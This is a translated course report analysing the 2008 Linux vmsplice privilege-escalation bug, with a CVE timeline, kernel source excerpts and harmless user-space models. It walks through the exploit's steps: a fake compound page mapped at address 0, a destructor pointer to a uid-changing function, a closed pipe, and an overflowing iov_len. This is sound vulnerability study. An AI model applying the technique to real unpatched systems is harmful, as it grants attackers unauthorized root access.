Analysis of the Linux vmsplice system call vulnerability that lets an ordinary user gain root privileges

Reposted from: http://www.nhs8.com/tech/2276.html

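The vmsplice system call was first introduced in Linux kernel 2.6.17 and was later found to contain a vulnerability that lets an ordinary user escalate to root. Online sources loosely give the affected range as 2.6.17-2.6.24.1; more precisely, it is 2.6.17-2.6.22.17, 2.6.23-2.6.23.15, and 2.6.24-2.6.24.1.

Few original write-ups of this vulnerability exist in Chinese. I covered it in the course report for my graduate operating systems class, so I am posting that report here. The hole has long been patched, but studying how it works is still worthwhile and interesting.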

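I. Background

1. Conventions used in this article

Code in this color comes from the exploit program

Code in this color comes from the kernel

This color marks an important spot or, following the program logic, the next function to be entered

The exploit code referred to throughout is exp.c, which accompanies this article.

2. Introduction to vmsplice()

Prototype: long vmsplice(int fd, const struct iovec *iov, unsigned long nr_segs, unsigned int flags);

where: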

struct iovec

{

void __user *iov_base;

__kernel_size_t iov_len;

};

This system call maps user-space memory into kernel space, which avoids actually copying the data and so improves efficiency. The work is done mainly by do_vmsplice() in fs/splice.c.
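For readers who have not used the call before, here is a minimal sketch of a harmless vmsplice() round trip: a small buffer is handed to a pipe and read back. The helper names vmsplice_raw() and vmsplice_roundtrip() are made up for this illustration and do not come from exp.c. Going through syscall() rather than a libc wrapper is an assumption, made only to keep the sketch independent of how the C library declares the call.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <sys/syscall.h>   /* SYS_vmsplice */
#include <sys/types.h>
#include <sys/uio.h>       /* struct iovec */
#include <unistd.h>        /* pipe, read, close, syscall */

/* Hypothetical thin wrapper around the raw system call. */
static long vmsplice_raw(int fd, const struct iovec *iov,
                         unsigned long nr_segs, unsigned int flags)
{
    return syscall(SYS_vmsplice, fd, iov, nr_segs, flags);
}

/*
 * Hypothetical helper: pushes len bytes of msg into a fresh pipe with
 * vmsplice(), then reads them back into out.
 * Returns the number of bytes read back, or -1 on failure.
 */
ssize_t vmsplice_roundtrip(const char *msg, size_t len, char *out, size_t outsz)
{
    int pi[2];
    if (pipe(pi) != 0)
        return -1;

    struct iovec iov = {
        .iov_base = (void *)msg,  /* user buffer handed to the pipe */
        .iov_len  = len,          /* an honest length, unlike ULONG_MAX */
    };

    long sent = vmsplice_raw(pi[1], &iov, 1, 0);
    ssize_t got = -1;
    if (sent > 0) {
        size_t want = (size_t)sent < outsz ? (size_t)sent : outsz;
        got = read(pi[0], out, want);
    }

    close(pi[0]);
    close(pi[1]);
    return got;
}
```

Calling vmsplice_roundtrip("hello", 5, buf, sizeof buf) on a Linux system should fill buf with the same five bytes. Note that iov_len here describes the real size of the buffer, which is exactly the property the exploit violates.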

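3. Page-related constants

#define PAGE_SHIFT 12

#define PAGE_SIZE (1UL << PAGE_SHIFT)

/* 1UL is an unsigned long 1 (32 bits wide on 32-bit x86); shifted left by 12 bits it gives PAGE_SIZE = 0x1000 */

#define PAGE_MASK (~(PAGE_SIZE-1))

/* PAGE_MASK = 0xfffff000 on 32-bit x86 */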
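As a quick check of these constants, the sketch below recomputes them with uint32_t, so the values match 32-bit x86 even when compiled on a 64-bit host. The helpers page_offset() and page_base() are illustrative names introduced here, not kernel functions.

```c
#include <stdint.h>

/* Same definitions as in the text, pinned to 32 bits via uint32_t. */
#define PAGE_SHIFT 12
#define PAGE_SIZE  ((uint32_t)1 << PAGE_SHIFT)
#define PAGE_MASK  (~(PAGE_SIZE - 1))

/* Offset of an address inside its page (the low 12 bits). */
uint32_t page_offset(uint32_t addr)
{
    return addr & ~PAGE_MASK;
}

/* Start address of the page that contains addr (the high 20 bits). */
uint32_t page_base(uint32_t addr)
{
    return addr & PAGE_MASK;
}
```

For example, the address 0x08049abc splits into page base 0x08049000 and offset 0xabc.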

II. A history of the splice system call vulnerabilities

2006 Jun 18

Linux kernel 2.6.17 is released and introduces vmsplice() to improve performance.

Nobody knows yet that the corresponding get_iovec_page_array() function in fs/splice.c contains a vulnerability.

2007 Oct 09

Linux kernel 2.6.23 is released.

It adds the vmsplice_to_user() and copy_from_user_mmap_sem() functions, which suffer from the same kind of flaw.

2007 Dec 03

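Vulnerability reports CVE-2008-0009 and CVE-2008-0010 are submitted to CVE.

They point out that vmsplice_to_user() and copy_from_user_mmap_sem(), respectively, contain this flaw.

Both reports contain one error: the two flaws exist in 2.6.23-2.6.24, not in 2.6.22-2.6.24 as the reports state, because these two functions were only added in 2.6.23.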

2008 Feb 05

Vulnerability report CVE-2008-0600 is submitted to CVE.

It states:

The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.

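In fact, the problem lies in get_iovec_page_array(). But because get_iovec_page_array() is called only by vmsplice_to_pipe() and all of its arguments come from vmsplice_to_pipe(), the failure of get_iovec_page_array() to validate user data can equally be described as a failure of vmsplice_to_pipe() to validate user data.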

2008 Feb 08

The Linux kernel 2.6.24.1 and 2.6.23.15 patch releases fix the two vulnerabilities described in CVE-2008-0009 and CVE-2008-0010.

2008 Feb 09

A hacker going by the ID qaaz publishes two corresponding proof-of-concept exploits on milw0rm: the first targets vmsplice_to_user() and copy_from_user_mmap_sem(), and the second targets get_iovec_page_array().

2008 Feb 11

The Linux kernel 2.6.24.2, 2.6.23.16, and 2.6.22.18 patch releases fix the flaw in get_iovec_page_array().

III. Effect of the exploit

No image.

IV. A real-world attack

This bug is being actively exploited in the wild — our server was just broken in to by an attacker using it. (They got a user’s password by previously compromising a machine somewhere else where that user had an account, and installed a modified ssh binary on it to record user names and passwords. Then they logged in to our site as that user, exploited CVE-2008-0010, and became root).

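V. The vmsplice() exploit story

1. The whole process can be summarized in the following diagram:

Online view: http://share.xmind.net/shidelai/vmsplice-loopholes-in-the-success-of-the-attack-1/

2. The exploit program does the following six things

1) Defines kernel_code()

This function changes the current user's uid and gid; the sole purpose of everything else is to get the kernel to execute this function.

2) Defines pages[5] (written as proc_pages in the snippets here), where: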

proc_pages[0]->flags = 1 << PG_compound;

proc_pages[0]->private = (unsigned long) proc_pages[0];

proc_pages[0]->count = 1;

This disguises proc_pages[0] as a compound page, so that when the kernel reaches the following code in mm/swap.c

void put_page(struct page *page)

{

if (unlikely(PageCompound(page)))

put_compound_page(page);

else if (put_page_testzero(page))

__page_cache_release(page);

}

it takes the put_compound_page(page); branch.

proc_pages[1]->lru.next = (long) kernel_code;

When the kernel reaches the following code in mm/swap.c

static void put_compound_page(struct page *page)

{

….

dtor = get_compound_page_dtor(page);

(*dtor)(page);

}

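get_compound_page_dtor returns proc_pages[1]->lru.next. In this way kernel_code() gets executed by the kernel.

3) mmaps proc_pages[0] at address 0x0

Later, when the kernel is tricked into calling the function that lru.next of the second page at address 0 points to, what it actually runs is kernel_code(), the target of the proc_pages[1]->lru.next set up here.

4) close(pi[0]); closes the read end of the pipe. When the kernel reaches the following code in splice_to_pipe() in fs/splice.c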

for (;;) {

if (!pipe->readers) {

send_sig(SIGPIPE, current, 0);

if (!ret)

ret = -EPIPE;

break;

}

…

}

…

while (page_nr < spd_pages)

page_cache_release(spd->pages[page_nr++]);

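the if test evaluates to true, so execution breaks out of the for loop, which causes page_cache_release(spd->pages[page_nr++]); to be executed.

5) iov.iov_len = ULONG_MAX;

iov.iov_len is thirty-two 1 bits (0xffffffff on a 32-bit system). This is the key: it guarantees an integer overflow inside the kernel, which tricks the kernel into using the pages prepared by the exploit program.

6) _vmsplice(pi[1], &iov, 1, 0);

Issues the vmsplice system call.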
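The effect of step 4) can be observed from user space without touching vmsplice at all: an ordinary write() to a pipe whose read end is closed fails with EPIPE and raises SIGPIPE, the same condition that the !pipe->readers branch reports. The following is a minimal sketch; write_to_readerless_pipe() is a name invented for this illustration.

```c
#include <errno.h>
#include <signal.h>
#include <unistd.h>

/*
 * Hypothetical helper: writes one byte to a pipe whose read end is closed
 * and returns the resulting errno (0 if the write unexpectedly succeeds,
 * -1 if the pipe could not be created).
 */
int write_to_readerless_pipe(void)
{
    int pi[2];
    if (pipe(pi) != 0)
        return -1;

    /* Ignore SIGPIPE so the failed write is reported through errno
     * instead of terminating the process. */
    void (*old)(int) = signal(SIGPIPE, SIG_IGN);

    close(pi[0]);                        /* same move as step 4) */
    ssize_t n = write(pi[1], "x", 1);
    int err = (n < 0) ? errno : 0;

    close(pi[1]);
    if (old != SIG_ERR)
        signal(SIGPIPE, old);            /* restore the previous disposition */
    return err;
}
```

On a POSIX system the helper is expected to return EPIPE. The exploit relies on the same early exit, because it is the exit path that walks spd->pages and releases each entry.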

3. Details of the kernel code execution

1) After _vmsplice(pi[1], &iov, 1, 0); is executed, the following function in fs/splice.c

long sys_vmsplice(int fd, const struct iovec __user *iov, unsigned long nr_segs, unsigned int flags)

{

…

if (file->f_mode & FMODE_WRITE) // writing to the pipe

error = vmsplice_to_pipe(file, iov, nr_segs, flags);

…

}

is called.

2) The kernel then enters the following function in fs/splice.c:

static long vmsplice_to_pipe(struct file *file, const struct iovec __user *iov,

unsigned long nr_segs, unsigned int flags)

{

struct pipe_inode_info *pipe;

struct page *pages[PIPE_BUFFERS]; // note this

struct partial_page partial[PIPE_BUFFERS]; // #define PIPE_BUFFERS (16) // note this

struct splice_pipe_desc spd = { // note this

.pages = pages,

.partial = partial,

.flags = flags,

.ops = &user_page_pipe_buf_ops,

};

…

spd.nr_pages = get_iovec_page_array(iov, nr_segs, pages, partial,

flags & SPLICE_F_GIFT);

…

return splice_to_pipe(pipe, &spd);

}

3) The kernel then enters the following function in fs/splice.c:

static int get_iovec_page_array(const struct iovec __user *iov,

unsigned int nr_vecs, struct page **pages,

struct partial_page *partial, int aligned)

{

……

if (copy_from_user_mmap_sem(&entry, iov, sizeof(entry))) //entry = iov

break;

base = entry.iov_base;// base address of the user buffer

len = entry.iov_len;// length

……

npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;

// npages = (0 + 0xffffffff + 0x1000 - 1) >> PAGE_SHIFT; the 32-bit sum wraps around to 0xffe, so npages = 0xffe >> 12 = 0

if (npages > PIPE_BUFFERS - buffers)

npages = PIPE_BUFFERS - buffers;

error = get_user_pages(current, current->mm,

(unsigned long) base, npages, 0, 0,

&pages[buffers], NULL);

……

}
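The wrap-around in the npages computation can be reproduced in user space. The sketch below uses uint32_t as a stand-in for a 32-bit unsigned long. The functions npages_unchecked() and npages_would_wrap() are illustrative names, and the second one is only a hypothetical way to detect the overflow, not the check used in the actual kernel fix.

```c
#include <stdint.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE  ((uint32_t)1 << PAGE_SHIFT)

/*
 * Models the unchecked kernel expression
 *     npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
 * in 32-bit unsigned arithmetic, where overflow silently wraps.
 */
uint32_t npages_unchecked(uint32_t off, uint32_t len)
{
    return (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
}

/* Returns 1 if off + len + PAGE_SIZE - 1 does not fit in 32 bits. */
int npages_would_wrap(uint32_t off, uint32_t len)
{
    uint64_t wide = (uint64_t)off + len + PAGE_SIZE - 1;
    return wide > UINT32_MAX;
}
```

With off = 0 and len = 0xffffffff the sum wraps to 0xffe, so npages_unchecked() yields 0, whereas an honest request such as len = 8192 yields 2. A page count of 0 is what lets the later loops run without a meaningful upper bound.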

4) The kernel then enters the following function in mm/memory.c:

int get_user_pages(struct task_struct *tsk, struct mm_struct *mm,

unsigned long start, int len, int write, int force,

struct page **pages, struct vm_area_struct **vmas)

{

……

do {

……

i++;

start += PAGE_SIZE;

len--;

continue;

}

do {

……

i++;

start += PAGE_SIZE;

len--;

} while (len && start < vma->vm_end);

} while (len);

return i;

}

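Here len is an int, no longer an unsigned long. Both loops are do/while loops, so the body runs before len is tested: len is decremented from 0 to -1, which is nonzero, and the loops keep going instead of stopping. (A 32-bit int would only wrap from -2147483648 (0x80000000) to +2147483647 (0x7fffffff) after roughly two billion decrements; the walk ends far earlier, once start is no longer covered by a mapping.) In the end the function returns i = 46.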
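The effect of entering a do/while loop with len == 0 can be shown with a stripped-down model. This is only a sketch of the loop shape: gup_model() and its mapped parameter (the number of pages assumed to be mapped starting at start) are inventions for this illustration, and the model returns a plain count where the kernel has more detailed error handling.

```c
/*
 * Simplified model of the loop structure in get_user_pages().
 *   len    - signed page count requested by the caller
 *   mapped - hypothetical number of pages actually mapped from start
 * Returns i, the number of pages the loop would have collected.
 */
int gup_model(int len, int mapped)
{
    int i = 0;

    do {
        if (i >= mapped)    /* stands in for "no mapping covers start" */
            return i;
        i++;
        len--;              /* 0 becomes -1, which still tests as true */
    } while (len);

    return i;
}
```

A normal request such as gup_model(16, 46) stops at 16. A request of 0 never sees len reach zero again, so gup_model(0, 46) runs until the mapping is exhausted and returns 46, far more than the 16 slots the caller has room for.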

5) i is then returned to the following function in fs/splice.c:

static int get_iovec_page_array(const struct iovec __user *iov,

unsigned int nr_vecs, struct page **pages,

struct partial_page *partial, int aligned)

{

……

error = get_user_pages(current, current->mm,

(unsigned long) base, npages, 0, 0,

&pages[buffers], NULL);

//error = 46

……

for (i = 0; i < error; i++) {

const int plen = min_t(size_t, len, PAGE_SIZE - off);

partial[buffers].offset = off;

partial[buffers].len = plen;

off = 0;

len -= plen;

buffers++;

}

……

}

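In this for loop the partial[] array has only 16 entries, yet the loop runs 46 times, so it overflows. The pages[] pointer array, which is declared just before partial[], is overwritten with 0.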
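The extent of the overrun can be estimated with a flat model of the stack frame. Everything about the layout below is an assumption made for illustration: partial[] is taken to consist of two 32-bit words per entry (offset and len), pages[] is taken to sit immediately above it, and pointers are taken to be 32 bits wide. The real layout depends on the kernel version and compiler. The function clobbered_page_slots() is a made-up name.

```c
#include <stdint.h>
#include <string.h>

#define PIPE_BUFFERS 16
#define PAGE_SIZE    4096u

enum {
    PARTIAL_WORDS = PIPE_BUFFERS * 2,            /* 16 {offset, len} pairs */
    PAGES_START   = PARTIAL_WORDS,               /* assumed: pages[] follows */
    PAGES_END     = PAGES_START + PIPE_BUFFERS,
    FRAME_WORDS   = 128                          /* size of the model frame */
};

/*
 * Replays the fill loop for count iterations on the model frame and
 * returns how many of the 16 pages[] slots were overwritten.
 */
int clobbered_page_slots(int count, uint32_t len)
{
    uint32_t frame[FRAME_WORDS];
    uint32_t off = 0;
    int clobbered = 0;

    memset(frame, 0xAA, sizeof frame);   /* 0xAAAAAAAA marks untouched words */

    for (int i = 0; i < count && 2 * i + 1 < FRAME_WORDS; i++) {
        uint32_t room = PAGE_SIZE - off;
        uint32_t plen = len < room ? len : room;
        frame[2 * i]     = off;          /* models partial[i].offset */
        frame[2 * i + 1] = plen;         /* models partial[i].len */
        off = 0;
        len -= plen;
    }

    for (int w = PAGES_START; w < PAGES_END; w++)
        if (frame[w] != 0xAAAAAAAAu)
            clobbered++;
    return clobbered;
}
```

Under these assumptions, 16 iterations leave pages[] untouched, while 46 iterations overwrite all 16 slots. The model stays inside its own array at all times, so it only counts what would be overwritten rather than reproducing the overflow itself.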

6) Next, the function returns to the following code in fs/splice.c:

static long vmsplice_to_pipe(struct file *file, const struct iovec __user *iov,

unsigned long nr_segs, unsigned int flags)

{

……

spd.nr_pages = get_iovec_page_array(iov, nr_segs, pages, partial,

flags & SPLICE_F_GIFT);

……

return splice_to_pipe(pipe, &spd);

}

7) and enters the following function in fs/splice.c:

ssize_t splice_to_pipe(struct pipe_inode_info *pipe,

struct splice_pipe_desc *spd)

{

……

for (;;) {

if (!pipe->readers) {

send_sig(SIGPIPE, current, 0);

if (!ret)

ret = -EPIPE;

break;

}

…….

}

……

while (page_nr < spd_pages)

page_cache_release(spd->pages[page_nr++]);

return ret;

}

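Because the read end of the pipe was closed earlier, execution breaks out of the for loop and the kernel reaches page_cache_release(spd->pages[page_nr++]);

Note: spd->pages here is the pages[] pointer array that the earlier overflow overwrote with 0.

8) Because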

#define page_cache_release(page) put_page(page)

9) the kernel therefore enters the following function in mm/swap.c:

void put_page(struct page *page)

{

if (unlikely(PageCompound(page)))

put_compound_page(page);

else if (put_page_testzero(page))

__page_cache_release(page);

}

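As mentioned earlier, the exploit program has disguised proc_pages[], which it mmapped at address 0, as a compound page, so after this if test

10) the kernel enters the following function, also in mm/swap.c: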

static void put_compound_page(struct page *page)

{

page = compound_head(page);

if (put_page_testzero(page)) {

compound_page_dtor *dtor;

dtor = get_compound_page_dtor(page);

(*dtor)(page);

}

}

11) and then enters the following function in include/linux/mm.h:

static inline compound_page_dtor *get_compound_page_dtor(struct page *page)

{

return (compound_page_dtor *)page[1].lru.next;

}

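OK. At this point the function pointer stored in proc_pages[1].lru.next, that is, the pointer to kernel_code(), is returned to dtor; (*dtor)(page); then calls that function, and the attack succeeds.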
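The dispatch chain from put_page() to the destructor can be modelled entirely in user space. The sketch below is not kernel code: struct page_model keeps only the fields mentioned in the text, the value 14 for PG_compound is an assumption of this model, private is treated as the head-page pointer (which is what the proc_pages[0]->private assignment in step 2) suggests), and lru.next is declared as a function pointer so that no pointer-to-integer cast is needed.

```c
#define PG_compound 14   /* bit number assumed for this model only */

struct page_model;
typedef void dtor_fn(struct page_model *);

/* In the kernel lru is a struct list_head; here next is typed as the
 * destructor pointer directly to keep the model portable. */
struct lru_model { dtor_fn *next; void *prev; };

/* Cut-down stand-in for struct page. */
struct page_model {
    unsigned long flags;
    int count;
    struct page_model *private;   /* head page of the compound page */
    struct lru_model lru;         /* page[1].lru.next holds the destructor */
};

static int dtor_calls;            /* how many times the destructor ran */

static void demo_dtor(struct page_model *page)
{
    (void)page;
    dtor_calls++;
}

/* Mirrors put_page() -> put_compound_page() -> get_compound_page_dtor(). */
void put_page_model(struct page_model *page)
{
    if (page->flags & (1UL << PG_compound)) {
        struct page_model *head = page->private;
        if (--head->count == 0) {
            dtor_fn *dtor = head[1].lru.next;
            dtor(head);
        }
    } else {
        page->count--;            /* ordinary page: no destructor involved */
    }
}

/* Builds two adjacent fake pages as in step 2) and releases the first. */
int run_dtor_demo(void)
{
    struct page_model pages[2] = {{0}};

    pages[0].flags = 1UL << PG_compound;
    pages[0].private = &pages[0];
    pages[0].count = 1;
    pages[1].lru.next = demo_dtor;

    dtor_calls = 0;
    put_page_model(&pages[0]);
    return dtor_calls;
}
```

In this model run_dtor_demo() reports that the destructor ran exactly once. It also makes clear why all three fields of the first fake page matter: the flag selects the compound path, private supplies the head page, and a count of 1 makes the reference count drop to zero so that the destructor is actually called.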